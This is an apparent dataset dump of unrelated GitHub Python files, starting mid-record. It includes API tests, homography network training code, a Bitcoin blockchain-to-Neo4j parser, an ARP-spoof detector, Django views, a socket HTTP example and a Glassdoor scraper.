**kwargs):\n year = 2013\n url = \"http://spcultura.prefeitura.sp.gov.br/api/\"\n\n result = [{\"createTimestamp\": {\"date\": \"2012-01-01 00:00:00.000000\"},\n \"terms\": {\"linguagem\": \"Cinema\"},\n \"classificacaoEtaria\": \"livre\"}]\n\n kwargs['mock'].get(url + \"event/find/\", text=json.dumps(result))\n request_events_in_period = RequestEventsInPeriod(year, url)\n events_in_period = request_events_in_period.data_length\n type_events_in_period = type(events_in_period)\n intenger = 1\n assert type_events_in_period == type(intenger)\n\n\nclass TestEmptyRequest(object):\n\n def test_request_data(self):\n request = EmptyRequest()\n\n event_request = request.data\n type_event_request = type(event_request)\n empty_list = []\n assert type_event_request == type(empty_list)\n\n def test_request_lenght(self):\n request = EmptyRequest()\n events_request = 
request.data_length\n type_request = type(events_request)\n intenger = 1\n assert type_request == type(intenger)\n","repo_name":"fga-eps-mds/2017.2-QueroCultura","sub_path":"events_indicators/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7769,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"22080115692","text":"#!/usr/bin/python3\r\n\r\n\"\"\"\r\nCMSC733 Spring 2019: Classical and Deep Learning Approaches for\r\nGeometric Computer Vision\r\nProject 1: MyAutoPano: Phase 2 Starter Code\r\n\r\n\r\nAuthor(s):\r\nNitin J. Sanket (nitinsan@terpmail.umd.edu)\r\nPhD Candidate in Computer Science,\r\nUniversity of Maryland, College Park\r\n\"\"\"\r\n\r\n# Dependencies:\r\n# opencv, do (pip install opencv-python)\r\n# skimage, do (apt install python-skimage)\r\n# termcolor, do (pip install termcolor)\r\n\r\nfrom re import L\r\nfrom unittest.mock import patch\r\n# import tensorflow as tf\r\nimport tensorflow.compat.v1 as tf\r\ntf.disable_v2_behavior()\r\nimport cv2\r\nimport sys\r\nimport os\r\nimport glob\r\n# import Misc.ImageUtils as iu\r\nimport random\r\nfrom skimage import data, exposure, img_as_float\r\nimport matplotlib.pyplot as plt\r\nfrom Network.Network import HomographyModel\r\nfrom Network.UnsupervisedNetwork import UnsupervisedModel\r\nfrom Misc.MiscUtils import *\r\nfrom Misc.DataUtils import *\r\nimport numpy as np\r\nimport time\r\nimport argparse\r\nimport shutil\r\n# from StringIO import StringIO\r\nimport string\r\nfrom termcolor import colored, cprint\r\nimport math as m\r\nfrom tqdm import tqdm\r\nfrom Misc.TFSpatialTransformer import *\r\nfrom sklearn.utils import shuffle\r\nfrom math import ceil\r\nfrom keras import backend as K\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint\r\nfrom GenerateData import GeneratePatches\r\n\r\n\r\n# Don't generate pyc codes\r\nsys.dont_write_bytecode = True\r\nconfig = tf.compat.v1.ConfigProto(gpu_options=tf.compat.v1.GPUOptions(allow_growth=True))\r\nsess = tf.compat.v1.Session(config=config)\r\n\r\ndef generator(ImagesPath,n_images,batch_size,image_names):\r\n \r\n # Infinite loop which ends when epochs specified is completed\r\n while True:\r\n # Creating batches\r\n patches=[]\r\n labels = []\r\n count=0\r\n while(count(t) \"\n \"MERGE (b)-[:COINBASE {witness:$wit, script_sig:$script_sig}]->(t) \",\n block_id=block_id, tx_id=tx_id, wit=str(witnesses),\n script_sig=inputs[0].script_sig.hex(),version=version, \n locktime=locktime,segwit=segwit)\n app_log.info(f\"Coinbase transaction {tx_id}\")\n return\n \n @staticmethod\n def _new_tx(tx,block_id, version, locktime, tx_id, inputs, outputs, segwit, i,coinbase=False):\n _outputs = []\n _inputs = []\n \n def encode_address(_script_pubkey,testnet=True):\n address = \"\"\n addr_type = \"\"\n length = encode_varint(len(_script_pubkey))\n stream = BytesIO(length+_script_pubkey)\n #stream = BytesIO(_script_pubkey)\n try: \n script_pubkey = Script.parse(stream)\n if script_pubkey.is_p2pkh_script_pubkey(): \n address= h160_to_p2pkh_address(script_pubkey.cmds[2], testnet)\n addr_type =\"P2PKH\"\n elif script_pubkey.is_p2sh_script_pubkey(): \n address= h160_to_p2sh_address(script_pubkey.cmds[1], testnet)\n addr_type = \"P2SH\"\n elif script_pubkey.is_p2wpkh_script_pubkey() or script_pubkey.is_p2wsh_script_pubkey(): \n if testnet: address = segwit_addr.encode(\"tb\",0,script_pubkey.cmds[1])\n else: address = segwit_addr.encode(\"bc\",0,script_pubkey.cmds[1]) \n if script_pubkey.is_p2wpkh_script_pubkey(): 
addr_type = \"P2WPKH\"\n else: addr_type = \"P2WSH\"\n elif len(script_pubkey.cmds)==2 and script_pubkey.cmds[1]==0xac:\n try: \n address = script_pubkey.cmds[0].hex()\n addr_type = \"P2PK\"\n except: app_log.info(f\"P2PK failed {script_pubkey.cmds[0]} from tx: {output['t.id']}\")\n\n except:\n app_log.info(f\"script parsing failed.\")\n \n \n return address, addr_type\n \n for index,output in enumerate(outputs):\n address, addr_type = encode_address(output.script_pubkey)\n output = {\n \"index\":index,\n \"script_pubkey\" : output.script_pubkey.hex(),\n \"amount\" : output.amount,\n \"address\" : address,\n \"type\" : addr_type\n }\n _outputs.append(output)\n \n for tx_in in inputs:\n witnesses = []\n for wit in tx_in.witness:\n try: witness = wit.hex()\n except: witness = wit\n witnesses.append(witness)\n \n _input = {\n \"prev_tx\" : tx_in.prev_tx.hex(),\n \"script_sig\" : tx_in.script_sig.hex(),\n \"witness\" : str(witnesses),\n \"prev_index\" : tx_in.prev_index\n }\n #We have to check if this is a coinbase transaction. If it is, it means it has no input. We only append no coinbase ins.\n #if _input[\"prev_index\"] != 4294967295:\n _inputs.append(_input)\n \n query = \"MERGE (b:block {id:$block_id}) \\n\"\n query+= \"MERGE (t:transaction {id:$tx_id}) \\n\"\n query+= \"SET t.version=$version, t.segwit=$segwit, t.locktime=$locktime \\n\"\n query+= \"MERGE (t)<-[:CONTAINS {i:$i}]-(b) \\n\"\n query+= \"WITH t,b \\n\"\n query+= \"FOREACH (output in $outputs | \\n\"\n query+= \"MERGE (o:output {index:output.index})<-[:CREATES]-(t) \\n\"\n query+= \"SET o.amount=output.amount, o.script_pubkey=output.script_pubkey \\n\"\n query+= \"FOREACH(ignoreMe IN CASE WHEN output.address <> '' THEN [1] ELSE [] END | \\n\"\n query+= \"MERGE (a:address {address:output.address}) SET a.address_type=output.type \\n \"\n query+= \"MERGE (a)<-[:RELATES]-(o)\"\n query+= \") \"\n query+= \") \\n\"\n \n if coinbase:\n query+= \"FOREACH (input in $inputs | \\n\"\n query+= \"MERGE (b)-[:COINBASE {witness:input.witness, script_sig:input.script_sig}]->(t)) \"\n #query+= \")\"\n else: \n query+= \"FOREACH (input in $inputs | \\n\"\n query+= \"MERGE (prev_trans: transaction {id:input.prev_tx}) \\n\"\n query+= \"MERGE (tx_in: output {index:input.prev_index})<-[:CREATES]-(prev_trans) \\n\"\n query+= \"MERGE (tx_in)-[:SPENDS {script_sig:input.script_sig, witness:input.witness}]->(t) \\n\"\n query+= \")\"\n \n result = tx.run(query,tx_id=tx_id, segwit=segwit, version=version, locktime=locktime, \n inputs=_inputs, outputs=_outputs, block_id=block_id, i=i)\n \n \n \n\n return True\n \n @staticmethod\n def _new_block(tx,block_id,version, prev_block,merkle_root,timestamp,bits,nonce,n_tx):\n #_height = tx.run( \"MATCH (u:block) RETURN COUNT (u) \").single()[0] \n #pblock = tx.run(\"MATCH (prev_block:block {id:$prev_block}) RETURN prev_block\", prev_block=prev_block)\n #if not pblock.single():\n # print(f\"COULD NOT FIND PREVIOUS BLOCK {prev_block}.\")\n result = tx.run(\"MERGE (block:block {id:$block_id}) \"\n \"SET block.n_tx=$n_tx, block.nonce=$nonce, block.merkle_root=$merkle_root, block.bits=$bits, block.timestamp=$timestamp, block.version=$version \"\n \"MERGE (prevblock:block {id:$prev_block}) \"\n \"MERGE (block)<-[:LINKS]-(prevblock) \"\n \"RETURN block \",\n block_id=block_id, version=version, prev_block=prev_block, merkle_root=merkle_root, timestamp=timestamp, \n bits=bits, nonce=nonce, n_tx=n_tx)\n return result.data()\n \n\n @staticmethod \n def _check_constrains(tx):\n \n print(\"checking constraints.\")\n \n tx_id = 
False\n block_id = False\n address_address = False\n result = tx.run(\"CALL db.constraints\")\n constraints = result.data()\n for constraint in constraints:\n if \"transaction.id\" in constraint[\"description\"] and \"UNIQUE\" in constraint[\"description\"]: tx_id = True\n elif \"block.id\" in constraint[\"description\"] and \"UNIQUE\" in constraint[\"description\"]: block_id = True\n elif \"address.address\" in constraint[\"description\"] and \"UNIQUE\" in constraint[\"description\"]: address_address = True\n if tx_id and block_id and address_address:\n print(\"CONSTRAINTS ALREADY EXISTS!\")\n return True\n else:\n result = tx.run(\"MERGE (b:block {id:'0000000000000000000000000000000000000000000000000000000000000000'}) \\n\"\n \"SET b.height = -1 \\n\"\n \"MERGE (t:transaction {id:'CONFIG'}) \\n\"\n \"MERGE (a:address {address:'CONFIG'}) \\n\"\n \"RETURN b,t,a \\n\")\n return False\n \n @staticmethod \n def _config_constrains(tx):\n \n result2 = tx.run(\"CREATE CONSTRAINT ON (t:transaction) ASSERT t.id IS UNIQUE \\n\")\n result3 = tx.run(\"CREATE CONSTRAINT ON (a:address) ASSERT a.address IS UNIQUE \\n\")\n result4 = tx.run( \"CREATE CONSTRAINT ON (b:block) ASSERT b.id IS UNIQUE \\n\")\n result4 = tx.run( \"CREATE CONSTRAINT ON (b:block) ASSERT b.height IS UNIQUE \\n\")\n \n print(\"constraints created.\")\n return \n \n def config_constrains(self):\n checked = False\n with self._driver.session() as session:\n result = session.write_transaction(self._check_constrains)\n #print(result)\n checked = result\n if not checked:\n with self._driver.session() as session:\n result = session.write_transaction(self._config_constrains)\n print(result)\n return result\n \n @staticmethod \n def _get_sixth_block_behind(tx):\n \n result = tx.run(\"MATCH (b:block) \"\n \"WITH MAX(b.height) AS tip \"\n \"MATCH (b:block {height:tip})<-[:LINKS]-(:block)<-[:LINKS]-(:block)\"\n \"<-[:LINKS]-(:block)<-[:LINKS]-(:block)<-[:LINKS]-(:block)<-[:LINKS]\"\n \"-(:block)<-[:LINKS]-(x:block) \"\n \"RETURN x.id\" )\n data = result.data()\n return data\n \n \n def new_tx(self, block_id, version, locktime, tx_id, inputs, outputs, segwit,i,coinbase):\n with self._driver.session() as session:\n result = session.write_transaction(self._new_tx, block_id, version, locktime, tx_id, inputs, outputs, segwit,i,coinbase)\n \n def new_coinbase_tx(self, block_id, version, locktime, tx_id, inputs, outputs, segwit,i):\n with self._driver.session() as session:\n result = session.write_transaction(self._new_coinbase_tx, block_id, version, locktime, tx_id, inputs, outputs, segwit,i)\n \n def new_block(self,block_id,version, prev_block,merkle_root,timestamp,bits,nonce,n_tx):\n with self._driver.session() as session:\n result = session.write_transaction(self._new_block,block_id,version, prev_block,merkle_root,timestamp,bits,nonce,n_tx)\n if len(result) >0: app_log.info(f\"CREATED BLOCK {block_id}\")\n else: app_log.error(f\"FAILED AT CREATING BLOCK {block_id}\")\n #print(result)\n return\n \n def get_sixth_block_behind(self):\n with self._driver.session() as session:\n result = session.write_transaction(self._get_sixth_block_behind)\n return result\n \n \ndef manager(args):\n \"\"\"\n args is a touple of 2 arguments: (arg1, arg2)\n arg1 is the index of the first blk#####.dat file that the parser will work on.\n arg2 is the number of threats, and therefore the number of files the parser will work on.\n For example, if the arguments are (2,2), this means that the parser will work on files\n blk00002.dat and blk00003.dat at the same time.\n arg2 
should never be more than 3 for efficiency reasons.\n    \"\"\"\n    #n_threads should be 3 or 2 to get maximum efficiency.\n    \n    n_threads = args[1]\n    n = args[0]\n    #db = BlockChainDB(driver = args[2])\n    db = BlockChainDB(\"neo4j://10.0.0.30:7687\", \"neo4j\", \"wallet\")\n    db.config_constrains()\n    file_list = [(f\"{i:05}\",db) for i in range( n , n + n_threads )]\n    with concurrent.futures.ThreadPoolExecutor(max_workers=n_threads) as executor:\n        executor.map(parse_blockchain, file_list) \n    return True \n\ndef get_cursor(file):\n    c = 0\n    print(f\"checking for cursors {file}\")\n    try:\n        cursor = open(f\"cursors/cursor{file}.txt\")\n        c = cursor.readline()\n        try:\n            c = int(c)\n            app_log.info(f\"cursor at {c} for file blk{file}.dat\")\n            cursor.close()\n            return c\n        except:\n            # the writer stores the sentinel \"FINISHED!\", so compare against it and pass it through\n            if c == \"FINISHED!\":\n                print(c)\n                return c\n            else:\n                try: \n                    app_log.info(f\"trying to recover file from backup for file blk{file}.dat.\")\n                    # the backup is written as cursors/cursor{file}.txt.bck below\n                    cursor = open(f\"cursors/cursor{file}.txt.bck\")\n                    c = cursor.readline()\n                    try:\n                        c = int(c)\n                        subprocess.call(f\" cp cursors/cursor{file}.txt.bck cursors/cursor{file}.txt\", shell=True)\n                        app_log.info(f\"successfully recovered file from backup for file blk{file}.dat. Restored original file.\")\n                        cursor.close()\n                        return c\n                    except:\n                        if c == \"FINISHED!\":\n                            cursor.close()\n                            print(c)\n                            subprocess.call(f\" cp cursors/cursor{file}.txt.bck cursors/cursor{file}.txt\",shell=True)\n                            app_log.info(f\"Finished. Successfully updated original file for file blk{file}.dat.\")\n                            return c\n                        else:\n                            app_log.info(f\"Corrupted cursor files for file blk{file}.dat.\")\n                            raise Exception\n\n                except:\n                    app_log.info(f\"No back-up file for file blk{file}.dat.\")\n                    raise Exception\n\n\n    except:\n        cursor = open(f\"cursors/cursor{file}.txt\",\"w\")\n        app_log.info(f\"No cursor file for file blk{file}.dat.\")\n        cursor.write(str(c))\n        print(c)\n        cursor.close()\n        return c\n\n    \n\ndef parse_blockchain(args):\n    \"\"\"\n    args: ( file index (######), database driver )\n    \"\"\"\n    parsing_current=True\n    continious_mode=False\n    file = f\"/home/pi/bitcoin/testnet3/blocks/blk{args[0]}.dat\"\n    db=args[1]\n    print(f\"parsing {file} on process {os.getpid()}\")\n    #print(f\"driver {db}\")\n    \n    while parsing_current:\n        \n        with open(file,\"rb\") as block_file:\n            \n            print(f\"opened {file}\")\n            c = get_cursor(args[0])\n            if c == \"FINISHED!\":\n                print(f\"We are done with file {file}\")\n                return\n            if c !=0: \n                print(f\"reading from {c} for file {file}.\")\n                block_file.read(c)\n\n            #infinite loop to parse the blk#####.dat file. \n            #Only stops when an error occurs or the file is over.\n            while True:\n                \n\n                try:\n                    #parse the block using the class Block from the file block.py\n                    this_block = Block.parse_from_blk(block_file)\n                    #The last file is full of fake blocks that contains 0 transactions and bits =0. If we run into these\n                    #fake blocks, we stop parsing to avoid filling the database with fake blocks and prevent from reading\n                    #the upcoming blocks.\n                    if this_block.tx_hashes == 0 and int.from_bytes(this_block.bits,\"big\") == 0:\n                        parsing_current=True \n                        continious_mode=True\n                        print(\"No new blocks. 
Sleeping for a minute.\")\n sleep(60)\n break\n parsing_current=False \n #calculate the block id using the header of the parsed block:\n #first the header is concatenated\n header = this_block.version.to_bytes(4,\"little\")+this_block.prev_block[::-1]+this_block.merkle_root[::-1]+this_block.timestamp.to_bytes(4,\"little\") + this_block.bits + this_block.nonce\n #then the concatenated header is hashed to get the block id.\n block_id = hash256(header)[::-1]\n app_log.info(f\"new block from file: {file[-13:]}\")\n #A new block is created in the database using the parsed block and its id.\n db.new_block(block_id.hex(),this_block.version, this_block.prev_block.hex(), \n this_block.merkle_root.hex(),this_block.timestamp, \n int.from_bytes(this_block.bits,\"big\"), \n int.from_bytes(this_block.nonce,\"big\"),\n this_block.tx_hashes)\n \n \n #Every transaction in the block is parsed using the Tx class from the file tx.py\n for transaction in range(this_block.tx_hashes):\n #the current transaction is parsed \n tx = Tx.parse(block_file)\n tx_id = tx.id()\n coinbase = tx.is_coinbase()\n #the parsed transaction is created in the database \n db.new_tx(block_id.hex(), tx.version, tx.locktime, tx_id, tx.tx_ins, tx.tx_outs, tx.segwit,transaction,coinbase)\n \n \n if continious_mode:\n continious_mode=False\n sixth_block_behind = db.get_sixth_block_behind()\n print(sixth_block_behind)\n try: blk_id = sixth_block_behind[0][\"x.id\"]\n except Exception as e:\n print(e)\n print(e.with_traceback)\n print(f\"couldn't get the sixth block behind for block {block_id.hex()}\")\n continue\n try: add_height.main(blk_id)\n except: print(\"A problem occured while adding the height to the last blocks.\")\n \n \n #the cursor is updated to start reading the next block. 8 bytes are added since some info comes before the flag. \n c += (this_block.size + 8)\n print(f\"cursor now at {c} for file {file}\")\n #print(c)\n #the cursor file and its backup file are updated\n cursor = open(f\"cursors/cursor{args[0]}.txt\",\"w\")\n cursor.write(str(c))\n cursor.close()\n cursor = open(f\"cursors/cursor{args[0]}.txt.bck\",\"w\")\n cursor.write(str(c))\n cursor.close()\n\n\n except Exception as e:\n size = os.stat(file).st_size\n if c == size:\n cursor = open(f\"cursors/cursor{args[0]}.txt\",\"w\")\n cursor.write(\"FINISHED!\")\n cursor.close()\n cursor = open(f\"cursors/cursor{args[0]}.txt.bck\",\"w\")\n cursor.write(\"FINISHED!\")\n cursor.close()\n \n print(f\"Finished {file} file. \")\n else:\n print(e)\n print(e.with_traceback)\n break\n\n\n\n\n","repo_name":"oscarsernarosero/block_explorer","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":20233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72242966246","text":"from scapy.all import Ether, ARP, srp, sniff, conf\r\nfrom colorama import init, Fore\r\nimport sys, random\r\n\r\n# some colors\r\ninit()\r\nGREEN = Fore.GREEN\r\nRESET = Fore.RESET\r\nGRAY = Fore.LIGHTBLACK_EX\r\n\r\ndef ClownLogo():\r\n clear = \"\\x1b[0m\"\r\n colors = [36, 32, 34, 35, 31, 37]\r\n\r\n x = \"\"\"\r\n\r\n \r\n ____ __ __ ___ ____ ____ _____ ____\r\n / __ \\___ / /____ _____/ /_ / | / __ \\/ __ \\ / ___/____ ____ ____ / __/\r\n / / / / _ \\/ __/ _ \\/ ___/ __/ / /| | / /_/ / /_/ / \\__ \\/ __ \\/ __ \\/ __ \\/ /_ \r\n / /_/ / __/ /_/ __/ /__/ /_ / ___ |/ _, _/ ____/ ___/ / /_/ / /_/ / /_/ / __/ \r\n /_____/\\___/\\__/\\___/\\___/\\__/ /_/ |_/_/ |_/_/ /____/ .___/\\____/\\____/_/ \r\n /_/ \r\n CS! 
: Detect ARP Spoof is an easy-to-use script; you can only run it on Linux. \r\n    \"\"\"\r\n    import time  # needed for the animation delay; 'time' was never imported at module level\r\n    for N, line in enumerate(x.split(\"\\n\")):\r\n        sys.stdout.write(\"\\x1b[1;%dm%s%s\\n\" % (random.choice(colors), line, clear))\r\n        time.sleep(0.05)\r\n\r\ndef get_mac(ip):\r\n    \"\"\"\r\n    Returns the MAC address of `ip`; if it is unable to find it\r\n    for some reason, throws `IndexError`\r\n    \"\"\"\r\n    p = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip)\r\n    result = srp(p, timeout=3, verbose=False)[0]\r\n    return result[0][1].hwsrc\r\n\r\ndef process(packet):\r\n    # if the packet is an ARP packet\r\n    if packet.haslayer(ARP):\r\n        # if it is an ARP response (ARP reply)\r\n        if packet[ARP].op == 2:\r\n            try:\r\n                # get the real MAC address of the sender\r\n                real_mac = get_mac(packet[ARP].psrc)\r\n                # get the MAC address from the packet sent to us\r\n                response_mac = packet[ARP].hwsrc\r\n                # if they're different, definitely there is an attack\r\n                if real_mac != response_mac:\r\n                    print(f\"[!] You are under attack, REAL-MAC: {real_mac.upper()}, FAKE-MAC: {response_mac.upper()}\")\r\n            except IndexError:\r\n                # unable to find the real mac\r\n                # may be a fake IP or firewall is blocking packets\r\n                pass\r\n\r\nif __name__ == \"__main__\":\r\n    import sys\r\n    ClownLogo()\r\n    try:\r\n        
views.eliminar_cita, name=\"eliminar_cita\"),\n path('servicios/cartonvacunas/', views.carton_vacunas, name=\"carton\"),\n path('modificar-carton//', views.modificar_carton, name=\"modificar_carton\"),\n path('eliminar-carton//', views.eliminar_carton, name=\"eliminar_carton\"),\n path('servicios/hospitalizacion/', views.hospitalizacionv, name=\"hospitalizacion\"),\n path('modificar-hospitalizacion//', views.modificar_hospitalizacion, name=\"modificar_hospitalizacion\"),\n path('eliminar-hospitalizacion//', views.eliminar_hospitalizacion, name='eliminar_hospitalizacion'),\n path('servicios/recetamedica', views.receta_medicas, name=\"receta\"),\n path('modificar-receta//', views.modificar_receta, name=\"modificar_receta\"),\n path('eliminar-receta/', views.eliminar_receta, name=\"eliminar_receta\"),\n]","repo_name":"JsonAndrx/vetasoft","sub_path":"servicios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70755717285","text":"import json\nfrom django.core import serializers\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.utils.text import slugify\nfrom django.views.generic import DetailView, View\n\nfrom .players.models import Player, PLAYER_HELPERS, PLAYER_POSITION_LINE_CHOICES\nfrom .players.forms import PlayersFilterForm\n\n\nclass ObjectDetailView(DetailView):\n template_name = 'shared/detail.html'\n\n def pagination(self, queryset, page_count=28):\n # Create pagination for the players return\n paginator = Paginator(queryset, page_count)\n\n # Get the page from the URL\n page = self.request.GET.get('page')\n\n try:\n # Deliver the requested page\n pagination = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n pagination = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 
9999), deliver last page of results.\n pagination = paginator.page(paginator.num_pages)\n\n return pagination\n\n def get_context_data(self, **kwargs):\n context = super(ObjectDetailView, self).get_context_data()\n\n obj = self.get_object()\n model_name = type(obj).__name__\n\n # Creates club=club, league=league, etc.\n filters = {model_name.lower(): obj}\n\n # Grab all of the things we want to filter the players by\n get_filters = self.request.GET.dict()\n\n # Remove the page key as that is for pagination\n get_filters.pop('page', '')\n\n position_group = get_filters.pop('group', '')\n\n if position_group:\n get_filters['position__in'] = position_group.upper().split('-')\n\n # These are for ordering by, not filtering\n sort_by = get_filters.pop('sort', '')\n sort_order = get_filters.pop('order', '')\n\n # Get our initial lot of players\n players = Player.objects.filter(\n **filters\n ).select_related(\n 'club', 'league', 'nation'\n )\n\n if sort_by:\n players = players.order_by(\n '{}{}'.format('-' if sort_order == 'desc' else '', sort_by)\n )\n\n # Grab the form so we can get the fields we filter by\n player_filter_form = PlayersFilterForm()\n\n # Some of the keys are wrong 'sho_han' for example, need to get the model field name\n sort_filters = {slugify(field.label).replace('-', '_'): field.label for\n field in player_filter_form}\n\n # Filter even further based on the GET parameters\n players = players.filter(\n **get_filters\n )\n\n # Rename to key so it can be removed form the url in the template\n if position_group:\n get_filters['group'] = get_filters.pop('position__in')\n\n context.update({\n 'players': self.pagination(players),\n 'player_instance': PLAYER_HELPERS,\n 'sort_filters': sort_filters,\n 'url_namespace': '{}:{}'.format(\n '{}s'.format(model_name),\n model_name\n ).lower(),\n 'get_filters': get_filters\n })\n\n return context\n\n\ndef card_class(obj):\n card_class = ''\n color_classes = {\n ' is-bronze': ['bronze', 'rare_bronze', 'totw_bronze', 'tots_bronze'],\n ' is-silver': ['silver', 'rare_silver', 'totw_silver', 'tots_silver'],\n ' is-gold': ['gold', 'rare_gold', 'totw_gold', 'tots_gold'],\n ' is-rare': ['rare_bronze', 'rare_silver', 'rare_gold'],\n ' is-totw': ['totw_bronze', 'totw_silver', 'totw_gold'],\n ' is-tots': ['tots_bronze', 'tots_silver', 'tots_gold'],\n ' is-toty': 'toty',\n ' is-motm': 'motm',\n ' is-easports': 'easports',\n ' is-purple': 'purple',\n ' is-green': 'green',\n ' is-pink': 'pink',\n ' is-legend': 'legend'\n }\n\n print(obj.get('color'))\n\n for css_class, color in color_classes.items():\n if obj.get('color') in color:\n card_class += css_class\n\n return card_class.lstrip()\n\n\nclass PlayerJSONList(View):\n def get(self, *args, **kwargs):\n players = serializers.serialize('json', Player.objects.all()[:28])\n\n return HttpResponse(json.dumps(players))\n\n def post(self, request, *args, **kwargs):\n text = request.POST.get('text')\n\n player_list = Player.objects.filter(\n Q(first_name__icontains=text) | Q(last_name__icontains=text)\n ).values(\n 'pk', 'common_name', 'color', 'overall_rating', 'image_medium',\n 'club__image_medium', 'nation__image_medium', 'slug'\n )[:20]\n\n players = []\n\n for player in player_list:\n new_player = {key: value for key, value in player.items()}\n new_player['css_class'] = Player.card_class(player)\n players.append(new_player)\n\n return HttpResponse(json.dumps(list(players), 
cls=DjangoJSONEncoder))\n","repo_name":"dan-gamble/fifa-x","sub_path":"fifa/apps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8392091216","text":"#You are to retrieve the following document using the HTTP protocol in a way that you can examine the HTTP Response headers.\n#http://data.pr4e.org/intro-short.txt\nimport socket #importing the socket library\n\nmysock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #creates a TCP socket object\nmysock.connect(('data.pr4e.org',80)) #establish a connection with a domain (data.pr4e.org) and port (80 - the standard port for an HTTP web server)\ncmd = 'GET http://data.pr4e.org/intro-short.txt HTTP/1.0\\r\\n\\r\\n'.encode() #creating a GET request (to be sent to the server) following the HTTP protocol and encoding it as a bytes object\nmysock.send(cmd) #sending the request through the mysock handle\n\nwhile True: # printing the retrieved data\n    data = mysock.recv(512)\n    if len(data) < 1:\n        break\n    print(data.decode())\nmysock.close() # closing the connection","repo_name":"dhrumiltailor10/python-programs","sub_path":"URLLIB/Socket.py","file_name":"Socket.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4918273635","text":"# take a list for example\n# a = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\n# and write a program that prints out all the elements\n# which are less than 5.\n\na = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nfor num in a:\n    if num < 5:\n        print(num)\n\n\n# Extras 1:\n# Instead of printing the elements one by one, \n# make a new list that has all the elements less than 5 \n# from this list in it and print out this new list.\nl = []\nfor num in a:\n    if num < 5:\n        l.append(num)\n\nprint(l)\n\n\n# Extras 2:\n# Ask the user for a number \n# and return a list that contains only elements from the original list \n# that are smaller than that number given by the user.\nx = []\nnumber = input("What is your number?
\")\nfor num in a:\n if num < int(number):\n x.append(num)\n\nprint(x)","repo_name":"UpCode-Academy/Python-Bootcamp-October","sub_path":"problems/02 - list.py","file_name":"02 - list.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2957344248","text":"from scrapy import Spider, Request\nfrom glassdoor.items import GlassdoorItem\nimport re\n\n\n\nclass GlassdoorSpider(Spider):\n name = \"glassdoor_spider\"\n allowed_domains = ['www.glassdoor.com']\n start_urls = ['https://www.glassdoor.com']\n\n def parse(self,response):\n\n result_urls = ['https://www.glassdoor.com/Award/Best-Places-to-Work-{}-LST_KQ0,24.htm'.format(x) for x in range(2009,2020)]\n\n for url in result_urls:\n yield Request(url=url, callback= self.parse_result_page,dont_filter=True)\n\n\n def parse_result_page(self,response):\n\n company_urls = response.xpath('//div[@class=\"employerLogo ml-xl mr-std\"]/a/@href').extract()\n\n company_urls = ['https://www.glassdoor.com{}'.format(x) for x in company_urls]\n\n try:\n year = re.findall('\\d+', response.xpath('//h1[@class=\"listTitle center my-xl strong\"]/small/text()').extract_first())[0]\n except: \n year = ''\n\n\n try: \n start_date = re.findall('\\d+/\\d+/\\d+',response.xpath('//span[@class=\"minor\"]/text()').extract_first())[0]\n except:\n start_date = ''\n\n try:\n end_date = re.findall('\\d+/\\d+/\\d+',response.xpath('//span[@class=\"minor\"]/text()').extract_first())[1]\n except: \n end_date = ''\n\n for url in company_urls:\n yield Request(url=url, callback = self.parse_overview_page, dont_filter=True, meta = {'start_date': start_date, 'end_date':end_date, 'year':year})\n\n def parse_overview_page(self,response):\n start_date = response.meta['start_date']\n end_date = response.meta['end_date']\n year = response.meta['year']\n\n\n benefitsurl = ''.join(response.xpath('//a[@class=\"eiCell cell benefits \"]/@href').extract()+response.xpath('//a[@class=\"eiCell cell benefits active\"]/@href').extract())\n\n benefits_url = 'https://www.glassdoor.com{}'.format(benefitsurl)\n\n company = response.xpath('//*[@id=\"DivisionsDropdownComponent\"]/text()').extract_first()\n\n website = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[1]/span/a/text()').extract_first()\n\n location = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[2]/span/text()').extract_first()\n\n employee_count = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[3]/span/text()').extract_first()\n\n founded = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[4]/span/text()').extract_first()\n\n cotype = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[5]/span/text()').extract_first()\n\n ticker = ''.join(re.findall('\\(([^\\)]+)\\)', cotype))\n\n industry = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[6]/span/text()').extract_first()\n\n revenue = response.xpath('//div[@class=\"info flexbox row col-hh\"]/div[7]/span/text()').extract_first()\n\n yield Request(url=benefits_url, callback = self.parse_benefits_page, dont_filter=True, meta = {'start_date': start_date, 'end_date':end_date, 'year':year, 'company':company,'website':website,'location':location,'employee_count':employee_count,'founded':founded,'cotype':cotype, 'ticker':ticker, 'industry':industry, 'revenue':revenue})\n\n def parse_benefits_page(self,response):\n start_date = response.meta['start_date']\n end_date = response.meta['end_date']\n year = 
